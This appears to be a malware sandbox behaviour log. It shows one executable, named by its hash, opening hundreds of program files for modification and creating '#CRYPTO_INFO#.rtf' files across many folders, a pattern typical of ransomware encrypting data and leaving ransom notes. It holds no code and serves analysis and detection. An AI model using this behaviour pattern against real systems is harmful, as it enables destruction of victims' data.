8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jre1.8.0_66\bin\server\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_65_ffffff_1x400.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin_2.0.100.v20131209-2144.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\AddressBook2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\back-arrow-focus.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\epl-v10.html 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.widgets_1.0.0.v20140514-1823.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\hr-hr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\root\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\da_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\cmm\PYCC.pf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\fr-fr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\plugins\rhp\createpdfupsell-app-selector.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner-2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\nl-nl\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\css\main.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\license.html 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\edit_pdf_poster.jpg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-charts_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sl-si\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_zh_cn_135x40.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\themes\dark\[email protected] 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\hrtfs\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\sv-se\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_unshare_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\tr-tr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\share_icons.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\cs-cz\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.attach_5.5.0.165303.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\deploy\messages_fr.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\release 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\asl-v20.txt 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\lib\jfluid-server-15.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\sendforcomments.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\boot.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\prc\MyriadCAD.otf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\zh-cn\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\zh-tw\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\zh-cn\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\bin\setNetworkServerCP 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Windows Mail\en-US\WinMail.exe.mui 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\selection-action-plugins\cpdf\plugin.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_de_135x40.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\it-it\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.theme.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\bn\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\plugin.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\s_close.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\tr-tr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Checkers.api 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\nub.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ro-ro\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\pl-pl\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\de-de\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\da-dk\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.forms_3.6.100.v20140422-1825.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_invite_24.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\nls\root\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ro-ro\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\he\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Comments.aapp 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\jfxswt.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\fi-fi\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ar-ae\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_fr.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\security\java.policy 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.operations.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\sv-se\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\css\main.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_de_135x40.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\ext\locale\updater_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\pt-br\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\fi-fi\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\de-de\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\en-il\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\fontconfig.properties.src 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\core_icons_hiContrast_bow.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\eu-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\inline-error-2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\convertpdf-selector.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\ZX______.PFB 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\fr-ma\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\pt-br\PlayStore_icon.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.osgi.services_3.4.0.v20140312-2051.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\themes\dark\rhp_world_icon_hover.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\sl-si\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\error-icon.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_sendforsignature_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\fr-ma\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\fr-ma\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_da_135x40.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\br\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Pages_R_RHP.aapp 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\fr-ma\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\de-de\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\tr-tr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\cmm\LINEAR_RGB.pf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\en-ae\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\es-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\themes\dark\adc_logo.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_tr_135x40.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\eu-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.jsp.jasper.registry_1.0.300.v20130327-1442.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\etc\visualvm.conf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\pt-br\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ko-kr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ro-ro\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\new_icons.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\sl-si\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jre1.8.0_66\lib\deploy\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\spectrum_spinner_process.svg 